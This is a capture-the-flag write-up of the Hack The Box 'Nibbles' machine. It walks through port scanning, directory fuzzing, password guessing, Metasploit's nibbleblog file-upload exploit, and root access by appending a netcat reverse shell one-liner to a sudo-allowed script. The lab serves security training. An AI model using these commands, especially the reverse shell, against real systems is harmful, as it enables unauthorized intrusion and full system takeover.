HTB | Nibbles

This is the Box on Hack The Box Linux Privilege Escalation 101 Track. Find the box here.

Skill Learned

• Enumerating web applications

• Guessing probable passwords

NMAP

IP: 10.10.10.75

nmap -sT -p- --min-rate 10000 10.10.10.75

nmap -sC -sV -p 22,80 10.10.10.75

nmap scan

Port 80

Let's visit port 80

port 80

nothing was there on dirsearch

dirsearch

on looking at the source code we found /nibbleblog/

/nibblelog

Let's fuzz the directory

dirsearch -u http://10.10.10.75/nibbleblog/ -x 404,403

dirsearch

found http://10.10.10.75/nibbleblog/content/private/users.xml

/nibbleblog/content/private/users.xml

Foothold/shell

since we have a username let's try to login http://10.10.10.75/nibbleblog/admin.php

/nibbleblog/admin.php

I tried a bunch of passwords admin:admin, admin:Nibble, admin:nibble, admin:nibbles

the last one worked

nibbleblog dashboard

we have also found http://10.10.10.75/nibbleblog/README

here we found its version

/nibbleblog/README

Now there are two ways

• CVE-2015-6967

• Metasploit -> multi/http/nibbleblog_file_upload

I used Metasploit, change the options as below

set USERNAME admin
set PASSWORD nibbles
set RHOST 10.10.10.75 
set RPORT 80
set TARGETURI /nibbleblog/

multi/http/nibbleblog_file_upload

we found user.txt

user.txt

Priv Esc

we found that we can run /home/nibbler/personal/stuff/monitor.sh without password

sudo -l

since we can run the script as sudo we can modify it to get root

let's append reverse shell to monitor.sh

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f" >> monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh

root.txt

we are in and found root.txt